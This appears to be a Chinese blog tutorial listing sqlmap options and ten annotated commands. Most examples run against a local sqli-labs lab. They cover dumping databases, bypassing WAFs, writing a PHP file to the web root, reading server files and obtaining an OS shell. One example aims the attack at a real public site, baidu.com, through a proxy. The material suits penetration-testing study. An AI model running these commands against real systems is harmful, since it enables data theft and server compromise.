sqlmap参数详解

命令及详解

-h帮助
--version版本号
-d连接数据库"mysql://root:root@192.168.3.20:3306/db"   "数据库种类://账号:密码@地址:端口/库
--current-db当前数据库
--dbs列出所有数据库 等于show database()
--tables列出某库的所有表
--columns列出某表的所有列
-D选择哪个数据库
-T选择哪个表
-C选择哪个列
--dump 获取字段里的数据
--dump-al脱库
--batch

选项全选yes

--smart启发式快速判断
--formspost请求注入 ,http包头包体每个字段尝试注入, --level最好是2
-r

从文件中载入http请求,指定数据包 先抓一个包然后保存下来使用-r

-g从谷歌里按照谷歌语法搜索前100条有get请求的url去测试
-o开启性能优化,优化的分别为--keep-alive,--null-connection,--thread
--tamper使用脚本,多脚本用逗号隔开 通常绕过waf
-v回显等级0~6
--delay访问间隔,绕过waf
--os-shell获取webshell
-m读取文件中的url批量操作
--datapost请求的包体可以直接写后面
--timeout设置超时时间
-level 注入探索等级,一般用4
--is-dba

是否是dba权限

--risk 风险等级(0-3,默认为1)
--identify-waf检测防火墙类型
--param-del设置参数分隔符
--skip-urlencode跳过url编码
--keep-alive这是持久连接,加快探测速度
--null-connection检索没有body响应内容,多用于盲注
--thread设置线程数,最大10
--technique  选择注入类型 B 布尔注入,E报错注入,U联合注入 T时间盲注 S 使用sqlmap的配置,如果是布尔盲注应选择U而并非B
--cookie "t=1"cookie注入
--safe-url每隔一段时间去访问安全页面
--proxy代理
--file-read读取服务器里的哪个文件,等同于手工注入的load_file()
--file-write选取本地的哪个文件
--file-dest写入服务器里的哪个文件 ,等同于手工注入的into out_file()和--file-write 一起使用
--dbms设置数据库类型

只要是单词或者是单词缩写的前面都是--,只要是单字母前面都是-

实例注解:

1、获取所有数据库

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o --dbs --batch  
--level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

2、获取test库中的表

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test 
--tables --batch  --level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#-D test 选择test库
#--tables 获取test库里的所有表
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

3、获取make表中的字段

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test -T make 
--columns --batch  --level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#-D test 选择test库
#-T make 选择make表
#--columns 获取make表里的所有字段
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

4、获取数据

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D longmao -T make 
--dump --batch  --level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#-D test 选择test库
#-T make 选择make表
#--dump  获取make表里的所有数据
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

5、写入文件到服务器

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --batch --dbms=MySql  
--file-write="1.php" --file-dest="D:/phpStudy/PHPTutorial/WWW/1.php"

#-u url
#--batch 操作默认选择为y
#--dbms=MySql 设置数据库为MySql
#--file-write="1.php"   选择本地文件1.php
#--file-dest="D:/phpStudy/PHPTutorial/WWW/1.php"  把本地1.php文件写入到服务器根目录里1.php文件

6、从服务器读入文件

sqlmap -u http://192.168.3.35/sqli-labs-master/Less-1/?id=1 --batch --dbms=MySql
--file-read="D:/phpStudy/PHPTutorial/WWW/1.php"

#-u url
#--batch 操作默认选择为y
#--dbms=MySql 设置数据库为MySql
#--file-read="1.php"  下载服务器根目录下的1.php文件

7、UA头注入

sqlmap -r "tt" -o --dbs --batch  --level=3 --threads=10 --dbms=MySql --technique="E"

#-r tt 从tt文件中载入http请求,tt文件中需要把UA头后面加上*号
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=3 注入探索等级为3
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="E" 设置注入类型为报错注入

8、获取webshell

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --os-shell

#-u url
#--os-shell 获取webshell

9、设置代理

sqlmap -u "https://www.baidu.com" -o --dbs --batch --proxy socks5://192.168.3.35:10888 
--level=4 --tamper=space2comment --threads=10 --dbms=MySql

#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--proxy socks5://192.168.3.35:10888  设置代理
#--level=4 注入探索等级为4
#--tamper=space2comment 使用脚本绕过waf
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql

10、Post布尔延迟注入

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-18/" -o --dbs --batch  
--level=3 --threads=10 --dbms=MySql --forms --technique="UT"

#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=3 注入探索等级为3
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--forms  Post注入
#--technique="UT" 设置注入方式为U为布尔注入和T为延迟注入

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值